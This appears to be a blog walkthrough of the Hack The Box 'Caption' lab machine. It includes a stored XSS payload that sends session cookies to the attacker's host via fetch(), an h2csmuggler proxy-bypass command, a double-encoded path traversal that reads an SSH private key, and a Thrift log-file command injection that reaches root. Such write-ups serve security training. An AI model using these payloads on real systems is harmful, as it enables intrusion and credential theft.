<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Caption | 0xW1LD</title>
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="Caption" />
<meta name="author" content="0xW1LD" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Enumeration nmap find the following ports open: ``` Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-21 00:47 EST Nmap scan report for caption.htb (10.10.11.33) Host is up (0.051s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 8080/tcp open http-proxy" />
<meta property="og:description" content="Enumeration nmap find the following ports open: ``` Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-21 00:47 EST Nmap scan report for caption.htb (10.10.11.33) Host is up (0.051s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 8080/tcp open http-proxy" />
<link rel="canonical" href="http://localhost:4000/htb/2025/02/08/Caption.html" />
<meta property="og:url" content="http://localhost:4000/htb/2025/02/08/Caption.html" />
<meta property="og:site_name" content="0xW1LD" />
<meta property="og:image" content="https://labs.hackthebox.com/storage/avatars/d3cb6edd2a219f122696655d0015b101.png" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-02-08T00:00:00+11:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="https://labs.hackthebox.com/storage/avatars/d3cb6edd2a219f122696655d0015b101.png" />
<meta property="twitter:title" content="Caption" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"0xW1LD"},"dateModified":"2025-02-08T00:00:00+11:00","datePublished":"2025-02-08T00:00:00+11:00","description":"Enumeration nmap find the following ports open: ``` Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-21 00:47 EST Nmap scan report for caption.htb (10.10.11.33) Host is up (0.051s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 8080/tcp open http-proxy","headline":"Caption","image":"https://labs.hackthebox.com/storage/avatars/d3cb6edd2a219f122696655d0015b101.png","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/htb/2025/02/08/Caption.html"},"publisher":{"@type":"Organization","logo":{"@type":"ImageObject","url":"http://localhost:4000/assets/img/logo.png"},"name":"0xW1LD"},"url":"http://localhost:4000/htb/2025/02/08/Caption.html"}</script>
<!-- End Jekyll SEO tag -->

    <link rel="stylesheet" href="/assets/css/style.css?v=">
    <script src="https://code.jquery.com/jquery-3.3.0.min.js" integrity="sha256-RTQy8VOmNlT6b2PIRur37p6JEBZUE7o8wPgMvu18MC4=" crossorigin="anonymous"></script>
    <script src="/assets/js/main.js"></script>
    <!--[if lt IE 9]>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js"></script>
    <![endif]-->
    <!-- start custom head snippets, customize with your own _includes/head-custom.html file -->

<!-- Setup Google Analytics -->


<!-- You can set your favicon here -->
<link rel="icon" href="/favicon.ico">

<!-- end custom head snippets -->
  </head>
  <body>
    <div class="wrapper">
      <header>
        <h1><a href="http://localhost:4000/">0xW1LD</a></h1>

        
          <img src="/assets/img/logo.png" alt="Logo" />
        

        <p>Just some 0xW1LD stuff...</p>

        

        

        
      </header>
      <nav>
        <ul></ul>
      </nav>
      <section>

      <small>8 February 2025</small>
<h1>Caption</h1>

<p class="view">by 0xW1LD</p>

<p><img src="https://labs.hackthebox.com/storage/avatars/d3cb6edd2a219f122696655d0015b101.png" alt="Caption" /></p>
<h1 id="enumeration">Enumeration</h1>
<p><code class="language-plaintext highlighter-rouge">nmap</code> find the following ports open:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-21 00:47 EST
Nmap scan report for caption.htb (10.10.11.33)
Host is up (0.051s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 8.76 seconds
</code></pre></div></div>
<h1 id="foothold">Foothold</h1>
<h3 id="caption-portal-login">Caption Portal Login</h3>
<p>On the webpage running on port <code class="language-plaintext highlighter-rouge">80</code> we find a custom login page:
<img src="/assets/img/2025-02-08-Caption/Pasted image 20250121165617.png" alt="Pasted image 20250121165617.png" /></p>
<h2 id="gitbucket">GitBucket</h2>
<p>On the webpage running on port <code class="language-plaintext highlighter-rouge">8080</code> we find a gitbucket site:
<img src="/assets/img/2025-02-08-Caption/Pasted image 20250121165713.png" alt="Pasted image 20250121165713.png" />
looking at the <a href="https://github.com/gitbucket/gitbucket">GitHub</a> page of <code class="language-plaintext highlighter-rouge">GitBucket</code> we find the default credentials: 
<code class="language-plaintext highlighter-rouge">root</code>
<code class="language-plaintext highlighter-rouge">root</code> 
which don’t seem to log us in.
We see two repositories, the <code class="language-plaintext highlighter-rouge">caption-portal</code> one looks interesting as it’s probably the webserver running on port <code class="language-plaintext highlighter-rouge">80</code></p>
<h2 id="caption-portal">Caption Portal</h2>
<p>Looking at the files initially found nothing interesting, checked the commit history and found: <code class="language-plaintext highlighter-rouge">Update Access Control</code> which nets us the following credentials:
<code class="language-plaintext highlighter-rouge">margo</code>
<code class="language-plaintext highlighter-rouge">vFr&amp;cS2#0!</code>
which we can use to login into the portal!:
<img src="/assets/img/2025-02-08-Caption/Pasted image 20250121170555.png" alt="Pasted image 20250121170555.png" />
Looking around we find nothing that stands out, trying to reuse the credentials to login to <code class="language-plaintext highlighter-rouge">GitBucket</code> also doesn’t work.
Intercepting the request to <code class="language-plaintext highlighter-rouge">/firewalls</code> and attempting <code class="language-plaintext highlighter-rouge">Host Header attacks</code> reveals that <code class="language-plaintext highlighter-rouge">X-Forwarded-Host</code> header is vulnerable to XSS:</p>
<div class="language-http highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">GET</span> <span class="nn">/firewalls</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="p">:</span> <span class="s">caption.htb</span>
<span class="na">User-Agent</span><span class="p">:</span> <span class="s">Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0</span>
<span class="na">Accept</span><span class="p">:</span> <span class="s">text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8</span>
<span class="na">Accept-Language</span><span class="p">:</span> <span class="s">en-US,en;q=0.5</span>
<span class="na">Accept-Encoding</span><span class="p">:</span> <span class="s">gzip, deflate, br</span>
<span class="na">Connection</span><span class="p">:</span> <span class="s">keep-alive</span>
<span class="na">Referer</span><span class="p">:</span> <span class="s">http://caption.htb/firewalls</span>
<span class="na">Cookie</span><span class="p">:</span> <span class="s">JSESSIONID=node01mho8ai0w4nxj1phn6mlxveywp79.node0; session=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Im1hcmdvIiwiZXhwIjoxNzM3NDYwNjYyfQ.BqBry30CBvRD33DrRY8SaWq-Q5_ZP3S23e_qtZGXinw</span>
<span class="na">Upgrade-Insecure-Requests</span><span class="p">:</span> <span class="s">1</span>
<span class="na">Priority</span><span class="p">:</span> <span class="s">u=0, i</span>
<span class="na">X-Forwarded-Host</span><span class="p">:</span> <span class="s">127.0.0.1"&gt;&lt;script&gt;alert('xss test');&lt;/script&gt;</span>
</code></pre></div></div>
<p><img src="/assets/img/2025-02-08-Caption/Pasted image 20250121220957.png" alt="Pasted image 20250121220957.png" />
Burp repeater seems inconsistent, however figured out later that this was due to a caching issue, using MatchAndReplace to automatically add header works
creating the following payload for stored XSS to steal cookies:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>X-Forwarded-Host: 127.0.0.1"&gt;&lt;script&gt;fetch('http://10.10.14.23/test.php?c='+document.cookie)&lt;/script&gt;
</code></pre></div></div>
<p>We get the following callback on our listening server:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>10.10.11.33 - - [21/Jan/2025 18:01:43] "GET /test.php?c=session=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzM3NTA0MDg0fQ.3KYn1rCsnRfsO9t8dQAI2FpEyqcbdlJLcNeGiCXoJ64 HTTP/1.1" 404 -
</code></pre></div></div>
<p>Running <code class="language-plaintext highlighter-rouge">feroxbuster</code> we find the following directories that are both <code class="language-plaintext highlighter-rouge">403 Forbidden</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>403      GET        4l        8w       94c http://caption.htb/logs
403      GET        4l        8w       94c http://caption.htb/download
</code></pre></div></div>
<p>Using the stolen cookies I am still getting <code class="language-plaintext highlighter-rouge">403 Forbidden</code> on those pages:<br />
<img src="/assets/img/2025-02-08-Caption/Pasted image 20250122122659.png" alt="Pasted image 20250122122659.png" /><br />
Knowing that <code class="language-plaintext highlighter-rouge">haproxy</code> is running on the background I attempt to bypass it using
<a href="https://github.com/BishopFox/h2csmuggler">H2Csmuggler</a></p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>python3 h2csmuggler.py <span class="nt">-x</span> <span class="s2">"http://caption.htb"</span> <span class="nt">-H</span> <span class="s2">"Cookie: session=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzM3NTE0MTg2fQ.LQFk69bSW_dgmNpF6kCo9O0VDV0yQwEPlBHYY3xRBgs; JSESSIONID=node0q95nb4nf8uib156s6htpkkank0.node0"</span> <span class="s2">"http://127.0.0.1:6081/download?url=http://127.0.0.1:3923/"</span>
</code></pre></div></div>
<p>checking the home page of the download url copy party server found this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;script src="/.cpr/util.js?_=kEZE"&gt;&lt;/script&gt;
&lt;script src="/.cpr/baguettebox.js?_=kEZE"&gt;&lt;/script&gt;
&lt;script src="/.cpr/browser.js?_=kEZE"&gt;&lt;/script&gt;
&lt;script src="/.cpr/up2k.js?_=kEZE"&gt;&lt;/script&gt;
</code></pre></div></div>
<p>Utilizing the <code class="language-plaintext highlighter-rouge">.cpr</code> directory attempted to read <code class="language-plaintext highlighter-rouge">/home/margo/.ssh/id_ecdsa</code> only to find that it’s not found, checking the output we find that our input is injected into a form action:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;form method="post" enctype="multipart/form-data" action="/.cpr//home/margo/.ssh/id_ecdsa"&gt;
</code></pre></div></div>
<p>Double encoding and attemting to grab ssh keys: <code class="language-plaintext highlighter-rouge">%252Fhome%252Fmargo%252F.ssh%252Fid_ecdsa</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS1zaGEy
&lt;SNIP&gt;
</code></pre></div></div>

<p>Got <code class="language-plaintext highlighter-rouge">margo</code></p>
<h1 id="margo-user">Margo (user)</h1>
<p>Looking back at <code class="language-plaintext highlighter-rouge">gitbucket</code> we see that the logservice is running on port <code class="language-plaintext highlighter-rouge">9090</code></p>
<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">func</span> <span class="n">main</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">handler</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">LogServiceHandler</span><span class="p">{}</span>
    <span class="n">processor</span> <span class="o">:=</span> <span class="n">log_service</span><span class="o">.</span><span class="n">NewLogServiceProcessor</span><span class="p">(</span><span class="n">handler</span><span class="p">)</span>
    <span class="n">transport</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">thrift</span><span class="o">.</span><span class="n">NewTServerSocket</span><span class="p">(</span><span class="s">":9090"</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="n">log</span><span class="o">.</span><span class="n">Fatalf</span><span class="p">(</span><span class="s">"Error creating transport: %v"</span><span class="p">,</span> <span class="n">err</span><span class="p">)</span>
    <span class="p">}</span>
 
    <span class="n">server</span> <span class="o">:=</span> <span class="n">thrift</span><span class="o">.</span><span class="n">NewTSimpleServer4</span><span class="p">(</span><span class="n">processor</span><span class="p">,</span> <span class="n">transport</span><span class="p">,</span> <span class="n">thrift</span><span class="o">.</span><span class="n">NewTTransportFactory</span><span class="p">(),</span> <span class="n">thrift</span><span class="o">.</span><span class="n">NewTBinaryProtocolFactoryDefault</span><span class="p">())</span>
    <span class="n">log</span><span class="o">.</span><span class="n">Println</span><span class="p">(</span><span class="s">"Starting the server..."</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">server</span><span class="o">.</span><span class="n">Serve</span><span class="p">();</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="n">log</span><span class="o">.</span><span class="n">Fatalf</span><span class="p">(</span><span class="s">"Error occurred while serving: %v"</span><span class="p">,</span> <span class="n">err</span><span class="p">)</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>which is consistent with the open ports:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>ss <span class="nt">-tulnp</span>
<span class="go">tcp     LISTEN   0        4096           127.0.0.1:9090          0.0.0.0:*
</span></code></pre></div></div>
<p>Looking at the service it uses the following library for log transport:
<a href="https://github.com/apache/thrift">Apache/Thrift github</a>
Here is the library’s documentation: <a href="https://thrift.apache.org/">Thrift</a>
Looking around for vulnerabilities in thrift I found out this:
<a href="https://github.com/advisories/GHSA-r4m4-pmvw-m6j5"> Apache Thrift Go Library Command Injection </a>
So I take a look at the thrift file in the github repository:</p>
<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">namespace</span> <span class="k">go</span> <span class="n">log_service</span>

<span class="n">service</span> <span class="n">LogService</span> <span class="p">{</span>
    <span class="kt">string</span> <span class="n">ReadLogFile</span><span class="p">(</span><span class="m">1</span><span class="o">:</span> <span class="kt">string</span> <span class="n">filePath</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Copy it to my box and use it to generate the files needed for a client:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>thrift <span class="nt">-r</span> <span class="nt">--gen</span> py log_service.thrift
</code></pre></div></div>
<p>Using  <a href="https://chatgpt.com/">ChatGPT</a> to generate the following client <code class="language-plaintext highlighter-rouge">poc</code> in python:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="n">sys</span>
<span class="kn">import</span> <span class="n">time</span>
<span class="kn">from</span> <span class="n">thrift</span> <span class="kn">import</span> <span class="n">Thrift</span>
<span class="kn">from</span> <span class="n">thrift.protocol</span> <span class="kn">import</span> <span class="n">TBinaryProtocol</span>
<span class="kn">from</span> <span class="n">thrift.transport</span> <span class="kn">import</span> <span class="n">TSocket</span><span class="p">,</span> <span class="n">TTransport</span>
<span class="kn">from</span> <span class="n">log_Service</span> <span class="kn">import</span> <span class="n">LogService</span>

<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="c1"># Connect to the Thrift server running on localhost:9090
</span>    <span class="n">transport</span> <span class="o">=</span> <span class="n">TSocket</span><span class="p">.</span><span class="nc">TSocket</span><span class="p">(</span><span class="sh">'</span><span class="s">127.0.0.1</span><span class="sh">'</span><span class="p">,</span> <span class="mi">9090</span><span class="p">)</span>
    <span class="n">transport</span> <span class="o">=</span> <span class="n">TTransport</span><span class="p">.</span><span class="nc">TBufferedTransport</span><span class="p">(</span><span class="n">transport</span><span class="p">)</span>
    <span class="n">protocol</span> <span class="o">=</span> <span class="n">TBinaryProtocol</span><span class="p">.</span><span class="nc">TBinaryProtocol</span><span class="p">(</span><span class="n">transport</span><span class="p">)</span>

    <span class="c1"># Create a client for the LogService
</span>    <span class="n">client</span> <span class="o">=</span> <span class="n">LogService</span><span class="p">.</span><span class="nc">Client</span><span class="p">(</span><span class="n">protocol</span><span class="p">)</span>

    <span class="k">try</span><span class="p">:</span>
        <span class="c1"># Open the transport connection
</span>        <span class="n">transport</span><span class="p">.</span><span class="nf">open</span><span class="p">()</span>

        <span class="c1"># Specify the log file path you want to read from the server
</span>        <span class="n">file_path</span> <span class="o">=</span> <span class="sh">"</span><span class="s">/home/margo/w1ld/log.log</span><span class="sh">"</span>

        <span class="c1"># Call the ReadLogFile method on the server
</span>        <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Calling ReadLogFile with file: </span><span class="si">{</span><span class="n">file_path</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
        <span class="n">response</span> <span class="o">=</span> <span class="n">client</span><span class="p">.</span><span class="nc">ReadLogFile</span><span class="p">(</span><span class="n">file_path</span><span class="p">)</span>

        <span class="c1"># Print the response received from the server
</span>        <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">Server Response:</span><span class="sh">"</span><span class="p">,</span> <span class="n">response</span><span class="p">)</span>

        <span class="c1"># Optionally, you can check the output file created by the server
</span>        <span class="n">output_file</span> <span class="o">=</span> <span class="sh">"</span><span class="s">output.log</span><span class="sh">"</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="n">output_file</span><span class="p">,</span> <span class="sh">'</span><span class="s">r</span><span class="sh">'</span><span class="p">)</span> <span class="k">as</span> <span class="nb">file</span><span class="p">:</span>
                <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="se">\n</span><span class="s">Contents of output.log:</span><span class="sh">"</span><span class="p">)</span>
                <span class="nf">print</span><span class="p">(</span><span class="nb">file</span><span class="p">.</span><span class="nf">read</span><span class="p">())</span>
        <span class="k">except</span> <span class="nb">FileNotFoundError</span><span class="p">:</span>
            <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Output file </span><span class="sh">'</span><span class="si">{</span><span class="n">output_file</span><span class="si">}</span><span class="sh">'</span><span class="s"> does not exist.</span><span class="sh">"</span><span class="p">)</span>

    <span class="k">except</span> <span class="n">Thrift</span><span class="p">.</span><span class="n">TException</span> <span class="k">as</span> <span class="n">tx</span><span class="p">:</span>
        <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Error: </span><span class="si">{</span><span class="n">tx</span><span class="p">.</span><span class="n">message</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

    <span class="k">finally</span><span class="p">:</span>
        <span class="c1"># Close the transport connection
</span>        <span class="n">transport</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="sh">"</span><span class="s">__main__</span><span class="sh">"</span><span class="p">:</span>
    <span class="nf">main</span><span class="p">()</span>
</code></pre></div></div>
<p>which reads the logfile <code class="language-plaintext highlighter-rouge">/home/margo/w1ld/log.log</code> which we must create:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>127.0.0.1 "user-agent":"'; /bin/bash /home/margo/w1ld/w1ld.sh#"
</code></pre></div></div>
<p>which calls <code class="language-plaintext highlighter-rouge">w1ld.sh</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cat /root/root.txt &gt;&gt; /home/margo/w1ld/root.txt
</code></pre></div></div>
<p>before running the script we must forward port <code class="language-plaintext highlighter-rouge">9090</code> to our home machine:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>ssh margo@caption.htb <span class="nt">-i</span> id_ecdsa <span class="nt">-L</span> 9090:127.0.0.1:9090
</code></pre></div></div>
<p>Run the script and read the root file:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">kali@kali:~/htb/caption/gen-py
</span><span class="gp">$</span><span class="w"> </span>python3 poc.py
<span class="go">[margo:~/w1ld]
</span><span class="gp">$</span><span class="w"> </span><span class="nb">ls</span>
<span class="go">log.log  root.txt  w1ld.sh
</span></code></pre></div></div>



  <small>tags: <em>os/linux</em> - <em>diff/hard</em></small>


      </section>
      <footer>
        
        <p><small>Powered by my one brain cell</small></p>
      </footer>
    </div>
    <script src="/assets/js/scale.fix.js"></script>
  </body>
</html>